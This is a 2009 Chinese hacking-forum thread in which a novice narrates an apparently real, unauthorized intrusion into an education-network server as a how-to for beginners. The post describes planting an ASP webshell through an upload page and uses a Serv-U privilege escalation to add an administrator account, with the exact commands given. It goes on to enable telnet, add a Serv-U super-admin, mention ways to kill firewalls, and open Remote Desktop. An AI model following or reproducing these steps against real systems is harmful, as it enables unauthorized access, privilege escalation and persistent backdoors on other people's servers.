论坛风格切换
正版合作和侵权请联系 sd173@foxmail.com
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
  • 2137阅读
  • 2回复

[求助-软件问题]菜鸟八步入侵某教育网全过程 [复制链接]

上一主题 下一主题
离线zhb_3448
 

发帖
59686
今日发帖
最后登录
2016-12-13
只看楼主 倒序阅读 使用道具 楼主  发表于: 2009-02-10 13:50:28


我从学习黑客到现在有一个月时间了,在华夏我学到不少知识. 下面我把头几天入侵某教育网全过程写下来,希望对刚入门的朋友有所帮助! 咱们共同学习!



1. 发现某站存在upfile.asp文件, 上传桂林老兵asp助手木马. (在这里我多说几句,asp木马很多,我个人感觉海洋顶端最垃圾, 老兵的还可以,最好的是kker的cs木马! 个人观点!)



2.登陆木马运行DOS命令,可提示说没有权限无法运行.



3.上传cmd.exe和net.exe文件到F盘(在这个盘我有执行权限,其它盘都没有)



4.ok了,可以运行dos了,但发现只能用net user查看用户, 不能用net user xxx xxx /add 添加用户.



看来走DOS这条路行不通了! 试试SQL注入, TMD试了半天,一个注入点没找到! 换方法.接着往下看.



5. 发现F盘存在serv-u , 哈哈~~~~ 大喜! 上传ftp.exe 本地提升权限.运行F:\Serv-U\ftp.exe "net user fdd fdd /add" 和F:\Serv-U\ftp.exe "net localgroup administrators fdd /add" 命令.成功把fdd变成了管理员.



6.运行F:\Serv-U\ftp.exe "net start telnet" 命令.成功开启telnet.



到第6步我以为彻底搞定了.可惜一连上telnet就提示与主机失去联系. 我已经做NTML验证了.为什么登陆不上呢? 原来是有防火墙! TNND (防火墙可以用pskill.exe杀掉,也可以自己写脚本然后用ntsd命令杀.这里我就不说了)



7.这台机器不是有serv-u吗? 我建个超管帐号,登陆他的FTP上去试试.于是修改serv-u目录下的ServUDaemon.ini文件.加了个超管帐号,可是无法登陆.TMD,为什么啊? 原来是需要从起servu才能生效.



8.net stop 对! 用net stop ! 用 net stop serv-u命令把ftp停了! 然后再启动serv-u.



9. 哈哈成功登陆对方FTP, 上传fd文件到上面.fd文件里面的内容是[Components] TsEnable = on.这个大家都知道. 运行Quote site exec sysocmgr.exe /i:c:\winnt\inf\sysoc.inf /u:c:\fd /q



哈哈~~~~~~~~ 3389打开了,成功登陆! 网速不错,下载速度1M/秒!



上面这些就是我入侵某服务器的全过程,走了不少弯路. 希望对新入门的朋友能有所帮助. 谢谢!

主队让半球高水,一般不能要主队!
凡是开半一的盘,一般不能要下盘!
凡是开一球或一球球半的盘,一般不能要上盘!
凡是开一球半以上的盘,一般不能要下盘!
离线七夜漓伤
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 沙发  发表于: 2009-02-10 21:24:23
从哪弄的
离线wutom

发帖
243754
今日发帖
最后登录
2023-12-02
只看该作者 板凳  发表于: 2009-02-11 08:19:59
这真的就能破了?学习下